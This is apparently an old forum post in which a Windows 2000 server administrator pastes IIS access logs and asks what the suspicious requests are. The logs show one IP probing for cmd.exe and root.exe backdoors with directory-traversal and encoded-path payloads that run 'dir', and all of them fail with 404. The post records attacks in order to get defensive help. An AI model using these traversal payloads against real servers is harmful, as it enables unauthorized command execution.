Hello All, I have W2K, E2K, ISA2K, ISM all installed on one server. Recently I have allowed inbound HTTPServer Inbound (port 80) connection (through ISA PACKET FILTERING) to allow my website to be viewed and after going though my website logs, I got very worried. Following is what I am getting my logs every few hours. Can someone tell me URGENTALLY what kind of request are these? Should I be worried? What can I do to prevent these? Thanks in advance for any help. Sushil Bhalla #Date: 2002-03-27 00:19:03 #Fields: date time c-ip cs-username s-sitename s-computername s-ip s-port cs-method cs-uri-stem cs-uri-query sc-status sc-win32-status sc-bytes cs-bytes time-taken cs-version cs-host cs(User-Agent) cs(Cookie) cs(Referer) 2002-03-27 00:19:03 203.200.51.30 - W3SVC3 SERVER mye.xte.rna.lip 80 GET /scripts/root.exe /c+dir 404 3 3396 72 15 HTTP/1.0 www - - - 2002-03-27 00:19:04 203.200.51.30 - W3SVC3 SERVER mye.xte.rna.lip 80 GET /MSADC/root.exe /c+dir 404 3 3396 70 0 HTTP/1.0 www - - - 2002-03-27 00:19:09 203.200.51.30 - W3SVC3 SERVER mye.xte.rna.lip 80 GET /c/winnt/system32/cmd.exe /c+dir 404 3 3396 80 0 HTTP/1.0 www - - - 2002-03-27 00:19:10 203.200.51.30 - W3SVC3 SERVER mye.xte.rna.lip 80 GET /d/winnt/system32/cmd.exe /c+dir 404 3 3396 80 16 HTTP/1.0 www - - - 2002-03-27 00:19:11 203.200.51.30 - W3SVC3 SERVER mye.xte.rna.lip 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 3 3396 96 16 HTTP/1.0 www - - - 2002-03-27 00:19:14 203.200.51.30 - W3SVC3 SERVER mye.xte.rna.lip 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 3 3396 117 0 HTTP/1.0 www - - - 2002-03-27 00:19:19 203.200.51.30 - W3SVC3 SERVER mye.xte.rna.lip 80 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 3 3396 117 0 HTTP/1.0 www - - - 2002-03-27 00:19:20 203.200.51.30 - W3SVC3 SERVER mye.xte.rna.lip 80 GET /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe /c+dir 404 3 3396 145 0 HTTP/1.0 www - - - 2002-03-27 00:19:22 203.200.51.30 - W3SVC3 SERVER mye.xte.rna.lip 80 GET /scripts/..Á../winnt/system32/cmd.exe /c+dir 404 3 3396 97 0 HTTP/1.0 www - - - 2002-03-27 00:19:23 203.200.51.30 - W3SVC3 SERVER mye.xte.rna.lip 80 GET /scripts/winnt/system32/cmd.exe /c+dir 404 3 3396 97 15 HTTP/1.0 www - - - 2002-03-27 00:19:25 203.200.51.30 - W3SVC3 SERVER mye.xte.rna.lip 80 GET /winnt/system32/cmd.exe /c+dir 404 3 3396 97 0 HTTP/1.0 www - - - 2002-03-27 00:19:27 203.200.51.30 - W3SVC3 SERVER mye.xte.rna.lip 80 GET /winnt/system32/cmd.exe /c+dir 404 3 3396 97 16 HTTP/1.0 www - - -